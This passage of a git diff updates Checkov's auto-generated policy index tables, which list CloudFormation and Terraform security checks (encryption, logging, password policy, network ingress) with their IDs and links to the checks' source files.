resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is 
not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | 
resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV_AWS_367 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts | Cloudformation | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py) | +| 174 | CKV_AWS_368 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality 
Job uses KMS to encrypt data on attached storage volume | Cloudformation | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py) | +| 175 | CKV_AWS_369 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs | Cloudformation | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py) | +| 176 | CKV_AWS_370 | resource | AWS::SageMaker::Model | Ensure Amazon SageMaker model uses network isolation | Cloudformation | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py) | +| 177 | CKV_AWS_371 | resource | AWS::SageMaker::NotebookInstance | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2 | Cloudformation | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py) | +| 178 | CKV_AWS_373 | resource | AWS::Bedrock::Agent | Ensure Bedrock Agent is encrypted with a CMK | Cloudformation | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py) | +| 179 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 180 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | 
Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 181 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/terraform.md b/docs/5.Policy Index/terraform.md index eb6c063d13d..831942d2aa4 100644 --- a/docs/5.Policy Index/terraform.md +++ b/docs/5.Policy Index/terraform.md 
@@ -6,2120 +6,2165 @@ nav_order: 1 # terraform resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | -| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | -| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | -| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | 
[SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | -| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | -| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | -| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | -| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | -| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | -| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | -| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | 
alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | 
[RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | 
[RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | 
[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | -| 44 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 45 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 46 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | -| 47 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all 
data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 48 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 49 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 50 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 51 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | -| 52 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 53 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | 
[LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 54 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | -| 55 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | -| 56 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | -| 57 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | -| 58 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | -| 59 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | -| 60 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one 
uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | -| 61 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | -| 62 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 63 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 64 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | -| 65 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 66 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 67 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. 
| Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 68 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 69 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 70 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 71 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | -| 72 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 73 | CKV_AWS_23 | resource | 